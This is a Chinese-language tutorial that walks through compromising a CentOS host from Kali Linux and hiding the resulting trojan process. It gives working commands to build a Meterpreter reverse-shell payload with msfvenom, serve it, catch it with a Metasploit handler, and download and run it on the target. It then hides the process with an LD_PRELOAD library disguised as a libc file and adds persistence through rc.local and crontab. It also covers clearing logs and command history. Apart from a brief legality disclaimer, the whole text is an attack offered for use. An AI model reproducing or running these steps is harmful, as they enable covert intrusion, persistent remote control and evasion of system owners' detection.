隐藏进程名的具体步骤:
-
环境准备:
- 确保你有两台机器:一台作为攻击者(Kali Linux),另一台作为目标(CentOS 7.6)。
- 配置网络,使两者可以互相访问。
-
生成Payload:
- 在Kali Linux上使用
msfvenom命令生成一个payload:msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.53 LPORT=4444 -b "\x00" -f elf -o /var/www/html/xuegod-ghost - 这个命令会创建一个ELF格式的文件,用于在目标系统上执行。
- 在Kali Linux上使用
-
启动Web服务:
- 在Kali Linux上启动Apache服务以提供payload下载:
systemctl start apache2
- 在Kali Linux上启动Apache服务以提供payload下载:
-
配置Metasploit侦听器:
- 在Kali Linux上配置Metasploit Framework侦听器:
msfdb run use exploit/multi/handler set payload linux/x64/meterpreter/reverse_tcp set lhost 192.168.1.53 set lport 4444 run
- 在Kali Linux上配置Metasploit Framework侦听器:
-
下载并运行Payload:
- 在CentOS目标系统上下载payload并运行:
curl http://192.168.1.53/xuegod-ghost -o xuegod-ghost chmod +x xuegod-ghost ./xuegod-ghost &
- 在CentOS目标系统上下载payload并运行:
-
隐藏进程:
- 编写一个恶意库文件(如
processhider.c),该文件将被加载到所有进程中,并隐藏特定的进程名。
- 编写一个恶意库文件(如
-
上传和编译恶意库:
- 将
processhider.c上传到CentOS系统,并编译成共享库(如libc2.28.so):gcc -Wall -fPIC -shared -o libc2.28.so processhider.c -ldl
- 将
-
配置
/etc/ld.so.preload:- 将编译好的恶意库文件路径添加到
/etc/ld.so.preload文件中,以便系统在执行程序时自动加载:echo /usr/local/lib/libc2.28.so >> /etc/ld.so.preload
- 将编译好的恶意库文件路径添加到
-
重新创建侦听:
- 在Metasploit上重新启动侦听器以连接隐藏的进程。
-
运行隐藏的Payload:
- 再次运行
xuegod-ghost,此时该进程不会出现在ps命令的输出中。
- 再次运行
-
恢复进程可见性:
- 删除恶意库文件并清空
/etc/ld.so.preload文件以恢复进程的可见性:rm -rf /usr/local/lib/libc2.28.so echo > /etc/ld.so.preload
- 删除恶意库文件并清空
-
脚本自动化:
- 创建一个自动化脚本(如
x.sh),该脚本自动化下载、编译、执行payload,以及配置隐藏进程。
- 创建一个自动化脚本(如
-
配置开机启动和计划任务:
- 将脚本添加到
/etc/rc.d/rc.local以实现开机自启动,或在/etc/crontab中设置计划任务。
- 将脚本添加到
-
系统日志清理:
- 清理系统日志以减少被发现的痕迹,包括删除历史命令和访问日志。
注意事项:
- 隐藏进程的技术可以用于逃避检测,但应当在合法的渗透测试和安全研究中使用。
- 确保你有适当的权限和授权来对目标系统进行操作。
- 清理日志时要谨慎,以避免破坏系统的正常运行。
通过上述步骤,你可以在Linux系统中隐藏木马程序进程,使其在常规的进程查看工具中不可见。这种技术在渗透测试中非常有用,但也可能被用于恶意目的,因此使用时需要严格遵守法律和道德规范。